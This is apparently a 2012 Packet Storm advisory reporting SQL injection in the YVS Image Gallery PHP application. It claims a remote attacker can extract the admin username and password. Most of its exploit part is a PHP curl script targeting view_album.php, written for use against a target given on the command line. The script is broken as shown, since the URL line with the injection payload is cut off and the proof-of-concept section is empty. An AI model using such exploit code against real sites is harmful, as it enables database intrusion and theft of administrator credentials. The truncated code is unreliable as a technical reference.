YVS Image Gallery SQL Injection

Type packetstorm
Reporter CorryL
Modified 2012-02-24T00:00:00


YVS Image Gallery  
Author: Corrado Liotta Aka CorryL [corryl80@gmail.com]  
-=[+] Application: YVS Image Gallery  
-=[+] Version:  
-=[+] Vendor's URL: http://yvs.vacau.com/gallery.html  
-=[+] Platform: Windows\Linux\Unix  
-=[+] Bug type: Sql INJECTIONS  
-=[+] Exploitation: Remote  
-=[+] Author: Corrado Liotta Aka CorryL ~ corryl80[at]gmail[dot]com ~  
-=[+] Facebook: https://www.facebook.com/CorryL  
-=[+] Twitter: https://twitter.com/#!/CorradoLiotta  
-=[+] Linkedin: http://it.linkedin.com/pub/corrado-liotta/21/1a8/611  
-=[+] +Google: https://plus.google.com/u/0/109396477464303670923  
...::[ Descriprion ]::..  
This is a small database driven gallery created to be implemented  
within your existing site.  
The coding is reasonably straight forward and can be easily moved into  
your existing development  
by anyone with basic understanding of PHP.  
Only a first attempt at the system has a long way to go,  
but it provides you with all the necessary tools to run your own  
picture gallery,  
such as uploading of multiple images and creation of thumbnails.  
The gallery is distributed as free-ware but if you decide to use it in  
any business or just decide that it's worth it,  
any donations will be greatly appreciated. details will be made available soon.  
...::[ Bug ]::..  
exploiting this bug a remote attaker is able' to go up again to user  
name and admin password  
...::[ Proof Of Concept ]::..  
...::[ Exploit ]::..  
#!/usr/bin/php -f  
# view_album.php curl exploit  
// Created by Corrado Liotta Aka CorryL  
// For educational only  
// use php exploit.php username for admin username o  
password for admin password  
$target = $argv[1];  
$info = $argv[2];  
$ch = curl_init();  
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);  
curl_setopt($ch, CURLOPT_URL,  
curl_setopt($ch, CURLOPT_HTTPGET, 1);  
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE  
5.01; Windows NT 5.0)");  
curl_setopt($ch, CURLOPT_TIMEOUT, 3);  
curl_setopt($ch, CURLOPT_LOW_SPEED_LIMIT, 3);  
curl_setopt($ch, CURLOPT_LOW_SPEED_TIME, 3);  
curl_setopt($ch, CURLOPT_COOKIEJAR, "/tmp/cookie_$target");  
$buf = curl_exec ($ch);  
echo $buf;  
..::[ Disclousure Timeline ]::..  
[23/02/2012] - No Vendor Information  
Corrado Liotta A.k.a (CorryL)  
Email: corryl80@gmail.com  
Slype: corrado_liotta  
Facebook: http://www.facebook.com/home.php/CorryL  
Twitter: https://twitter.com/#!/CorradoLiotta  
Linkedin: http://it.linkedin.com/pub/corrado-liotta/21/1a8/611  
Specialist in:  
Bug Hunting  
Security Audits  
Penetration Test